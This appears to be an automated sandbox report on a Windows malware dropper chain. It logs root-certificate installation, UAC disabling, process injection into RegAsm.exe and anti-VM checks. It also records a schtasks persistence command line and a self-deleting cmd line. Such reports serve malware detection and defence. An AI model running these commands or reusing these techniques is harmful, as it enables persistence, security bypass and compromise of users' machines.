\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ZilJVJq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Processes:
keks.exeYtVJ0C8eA764GvOCeDcLOEZg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 keks.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 keks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 YtVJ0C8eA764GvOCeDcLOEZg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e YtVJ0C8eA764GvOCeDcLOEZg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e YtVJ0C8eA764GvOCeDcLOEZg.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstc.exepid process 2684 mstc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exechrosha.exetrf.exerundll32.exepowershell.exekeks.exejok.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemstc.exelie.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXERegAsm.exepid process 4452 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe 4452 7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe 1628 chrosha.exe 1628 chrosha.exe 4664 trf.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 3984 rundll32.exe 1332 powershell.exe 1332 powershell.exe 3932 keks.exe 3932 keks.exe 3932 keks.exe 3932 keks.exe 3932 keks.exe 3932 keks.exe 3024 jok.exe 3024 jok.exe 3024 jok.exe 3024 jok.exe 3024 jok.exe 2424 powershell.exe 2424 powershell.exe 2424 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 3540 powershell.exe 3540 powershell.exe 3540 powershell.exe 4584 powershell.exe 4584 powershell.exe 3800 powershell.exe 3800 powershell.exe 2684 mstc.exe 2684 mstc.exe 2316 lie.exe 2316 lie.exe 3192 powershell.exe 3192 powershell.exe 3192 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 1152 powershell.exe 1152 powershell.exe 1152 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 4820 powershell.exe 4820 powershell.exe 4820 powershell.exe 4224 powershell.EXE 4224 powershell.EXE 4224 powershell.EXE 3840 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
trf.exepowershell.exefile300un.exekeks.exemstc.exejok.exejsc.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 4664 trf.exe Token: SeBackupPrivilege 4664 trf.exe Token: SeSecurityPrivilege 4664 trf.exe Token: SeSecurityPrivilege 4664 trf.exe Token: SeSecurityPrivilege 4664 trf.exe Token: SeSecurityPrivilege 4664 trf.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 2756 file300un.exe Token: SeDebugPrivilege 3932 keks.exe Token: SeDebugPrivilege 2684 mstc.exe Token: SeDebugPrivilege 3024 jok.exe Token: SeDebugPrivilege 4748 jsc.exe Token: SeDebugPrivilege 4984 RegAsm.exe Token: SeDebugPrivilege 2424 powershell.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeDebugPrivilege 3800 powershell.exe Token: SeDebugPrivilege 2684 mstc.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemProfilePrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeProfSingleProcessPrivilege 2216 WMIC.exe Token: SeIncBasePriorityPrivilege 2216 WMIC.exe Token: SeCreatePagefilePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeDebugPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe Token: SeRemoteShutdownPrivilege 2216 WMIC.exe Token: SeUndockPrivilege 2216 WMIC.exe Token: SeManageVolumePrivilege 2216 WMIC.exe Token: 33 2216 WMIC.exe Token: 34 2216 WMIC.exe Token: 35 2216 WMIC.exe Token: 36 2216 WMIC.exe Token: SeIncreaseQuotaPrivilege 2216 WMIC.exe Token: SeSecurityPrivilege 2216 WMIC.exe Token: SeTakeOwnershipPrivilege 2216 WMIC.exe Token: SeLoadDriverPrivilege 2216 WMIC.exe Token: SeSystemProfilePrivilege 2216 WMIC.exe Token: SeSystemtimePrivilege 2216 WMIC.exe Token: SeProfSingleProcessPrivilege 2216 WMIC.exe Token: SeIncBasePriorityPrivilege 2216 WMIC.exe Token: SeCreatePagefilePrivilege 2216 WMIC.exe Token: SeBackupPrivilege 2216 WMIC.exe Token: SeRestorePrivilege 2216 WMIC.exe Token: SeShutdownPrivilege 2216 WMIC.exe Token: SeDebugPrivilege 2216 WMIC.exe Token: SeSystemEnvironmentPrivilege 2216 WMIC.exe Token: SeRemoteShutdownPrivilege 2216 WMIC.exe Token: SeUndockPrivilege 2216 WMIC.exe Token: SeManageVolumePrivilege 2216 WMIC.exe Token: 33 2216 WMIC.exe Token: 34 2216 WMIC.exe Token: 35 2216 WMIC.exe Token: 36 2216 WMIC.exe Token: SeDebugPrivilege 1152 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
mstc.exepid process 2684 mstc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrosha.exeswiiiii.exealexxxxxxxx.exegold.exeRegAsm.exeNewB.exedescription pid process target process PID 1628 wrote to memory of 3496 1628 chrosha.exe swiiiii.exe PID 1628 wrote to memory of 3496 1628 chrosha.exe swiiiii.exe PID 1628 wrote to memory of 3496 1628 chrosha.exe swiiiii.exe PID 3496 wrote to memory of 3124 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 3124 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 3124 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 3496 wrote to memory of 916 3496 swiiiii.exe RegAsm.exe PID 1628 wrote to memory of 3068 1628 chrosha.exe alexxxxxxxx.exe PID 1628 wrote to memory of 3068 1628 chrosha.exe alexxxxxxxx.exe PID 1628 wrote to memory of 3068 1628 chrosha.exe alexxxxxxxx.exe PID 3068 wrote to memory of 4844 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4844 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4844 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4508 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4508 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4508 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 3132 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 3132 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 3132 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 920 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 920 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 920 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 3068 wrote to memory of 4984 3068 alexxxxxxxx.exe RegAsm.exe PID 1628 wrote to memory of 2132 1628 chrosha.exe gold.exe PID 1628 wrote to memory of 2132 1628 chrosha.exe gold.exe PID 1628 wrote to memory of 2132 1628 chrosha.exe gold.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 2132 wrote to memory of 4696 2132 gold.exe RegAsm.exe PID 4984 wrote to memory of 3932 4984 RegAsm.exe keks.exe PID 4984 wrote to memory of 3932 4984 RegAsm.exe keks.exe PID 4984 wrote to memory of 3932 4984 RegAsm.exe keks.exe PID 4984 wrote to memory of 4664 4984 RegAsm.exe trf.exe PID 4984 wrote to memory of 4664 4984 RegAsm.exe trf.exe PID 1628 wrote to memory of 4596 1628 chrosha.exe NewB.exe PID 1628 wrote to memory of 4596 1628 chrosha.exe NewB.exe PID 1628 wrote to memory of 4596 1628 chrosha.exe NewB.exe PID 4596 wrote to memory of 3824 4596 NewB.exe schtasks.exe PID 4596 wrote to memory of 3824 4596 NewB.exe schtasks.exe PID 4596 wrote to memory of 3824 4596 NewB.exe schtasks.exe PID 1628 wrote to memory of 3024 1628 chrosha.exe jok.exe PID 1628 wrote to memory of 3024 1628 chrosha.exe jok.exe PID 1628 wrote to memory of 3024 1628 chrosha.exe jok.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe"C:\Users\Admin\AppData\Local\Temp\7744c183f3dbcfa2c78274c26293f65039eea5535832ca47e740e0f60e42d9f0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3124
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 9003⤵
- Program crash
PID:4480 -
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4844
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4508
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3132
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:920
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932 -
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:4448
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:1264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 4203⤵
- Program crash
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2132 -s 3883⤵
- Program crash
PID:2368 -
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:3824 -
C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe"3⤵
- Executes dropped EXE
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe"3⤵
- Executes dropped EXE
PID:4284 -
